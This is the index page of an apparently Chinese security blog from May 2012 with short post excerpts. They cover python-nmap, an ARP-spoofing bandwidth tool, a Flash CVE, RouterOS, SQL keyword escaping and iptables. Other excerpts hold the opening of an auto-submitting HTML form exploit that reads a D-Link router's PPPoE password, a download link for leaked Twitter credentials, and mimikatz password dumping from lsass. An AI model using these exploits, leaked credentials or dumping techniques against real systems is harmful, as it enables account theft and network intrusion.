python-nmap在windows下的一些问题

作者: 日期: 2012 年 5 月 28 日 2 条评论 | 100,169 次浏览

python-nmap是一个python的库,python2.x使用的是python-nmap-0.1.4,使用过程中遇到一点问题。记录如下:

错误信息:

Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "D:\opt\Python27\lib\multiprocessing\forking.py", line 373, in main
    prepare(preparation_data)[......]
继续阅读

幻境网盾3.7官方地址下载

作者: 日期: 2012 年 5 月 24 日 6 条评论 | 9,265 次浏览

这个工具比p2p终结者什么的有用多了,虽然是09年的东西了,原理还是不过时的哟,采用欺骗网关的方式来达到限速的目的,目前市面上各种版本各种说法的都有,大多都是捆毒的下载站,下面的是官方的下载站,绝对不忽悠。

下载地址:

http://www.cncert.net/up_files/soft/skiller3.70.rar

原地址失效,我传到了百度网盘:

http://pan.baidu.com/share/link?shareid=125145&uk=2905237318

注意:

需要安装.net 2.0 + winpcap (htt[……]

继续阅读

Flash远程代码执行漏洞(CVE-2012-0779)视频以及样本

作者: 日期: 2012 年 5 月 17 日 没有评论 | 7,349 次浏览

Flash播放器的漏洞,出来有几天了,补丁地址:

https://www.adobe.com/support/security/bulletins/apsb12-09.html

发布日期:2012-05-04
更新日期:2012-05-07

受影响系统:

Adobe Flash Player 11.x
Adobe Flash Player 10.x

不受影响系统:

Adobe Flash Player 11.2.202.235
Adobe Flash Player 11.1.115.8
Adobe Flash Player 11.1.111.9

编号是CVE-[……]

继续阅读

使用 Winbox 配置 RouterOS

作者: 日期: 2012 年 5 月 16 日 5 条评论 | 39,545 次浏览

winbox在MkroTik的官方网站有下载,自己搜一下就好了,最近用到这个软路由,记录一下教程,算是一个RouterOS的简单教程说明吧。

登陆 RouterOS

MikroTik RouterOS 内能通过远程配置各种参数,包括Telnet,SSH,WinBox 和 Webbox。在这里我们将着重介绍怎样使用 WinBox:

MAC-telnet 是在路由器没有IP 地址的情况下或者配置防火墙参数后无法连接,通过路由器网卡MAC 地址登录的方式远程连接到路由器。MAC-telnet 仅能使用在来自同一个广播域中(因此在网络中不能有路由的存在),且路由器的网卡应该被[……]

继续阅读

D-Link DSL-2640U路由器0day,免密码查看PPoE账户密码

作者: 日期: 2012 年 5 月 11 日 8 条评论 | 12,304 次浏览

D-Link的路由器很多都有这种漏洞,不只这一款,冰山一角而已,把下面代码保存为html文件就可以了。

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>Please Wait While Redirecting to PPoE Page </H2>
<form method="POST" name="form0" action="http://192.168.1.1/wizi[......]
继续阅读

泄露的Twitter账号密码下载以及密码规律统计

作者: 日期: 2012 年 5 月 9 日 没有评论 | 8,601 次浏览

5月9日消息,据国外媒体报道,昨天Twitter成千上万的用户账号密码和电邮地址遭曝光,目前还不清楚涉事者的身份,另外Twitter称其中涉及大量重复账号和已被停用的垃圾账号,因此确切的受影响的账号数也不清楚。

有很多重复的账号,从pastebin上面把泄露的账号密码都弄下来了,解压密码:nigesb.com,下载地址:

http://115.com/file/dptbv2hs

有人对泄露的账号进行了分析,结果如下:

----
Statistics of the "55.000 leaked Twitter accounts".

Note[......]
继续阅读

MS12-032的POC

作者: 日期: 2012 年 5 月 9 日 2 条评论 | 93,908 次浏览

微软发布了ms12-032的补丁:

http://technet.microsoft.com/en-us/security/bulletin/ms12-032

这个补丁是与TCP/IP协议有关的一个栈溢出问题,可以导致本地提权,目前微软已经要求StackOverflow.com移除这些代码。

老外是这么说的,尝试绑定一个IPV6-mapped IPV4 address,目前只能到crash down

We discovered that running our application under certain conditions results in Windo[......]
继续阅读

各数据库对于关键字转义的处理

作者: 日期: 2012 年 5 月 8 日 2 条评论 | 15,283 次浏览

今天玩ISCC2012,遇到了关键字的内容,经过hhjack大神提醒,终于过关,总结一下各数据库的关键字转义。

  • Mysql

Mysql对于关键字转义的做法是用`这个符号来进行,例如:

insert into app (name,`key`,secret) values ('aa','bb',null);
  • Access以及sqlserver

Access以及sqlserver对于关键字转义的做法是使用中括号,例如:

Select * from [key] where id=1;

介绍一下神器mimikatz,从lsass里抓密码

作者: 日期: 2012 年 5 月 8 日 39 条评论 | 60,384 次浏览

昨天弄了下OphCrack,一个破解windows密码的玩意,顺带想起了这个神器,mimikatz,本人首创中文译名为:咪咪卡住,不要笑,这是很严肃的名字。

咪咪卡住的下载地址:
http://blog.gentilkiwi.com/mimikatz

mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面抓密码。
进入咪咪卡住的目录,管理员身份运行:

//开始运行神器
mimikatz
//提[......]
继续阅读

iptables基础及模块高级应用

作者: 日期: 2012 年 4 月 27 日 2 条评论 | 6,476 次浏览

这个东西是之前的Chinaunix里面的ppt,现在做成了一个pdf共享出来,讲得还是很详细的,还介绍了iptables里面的一些插件等。以后可以做查找只用,不过版本关系可能有些新版上面的系统某些命令还是变了,大家自己参考一下吧,嘿嘿。

下载地址:

http://115.com/file/ancj7zfs[……]

继续阅读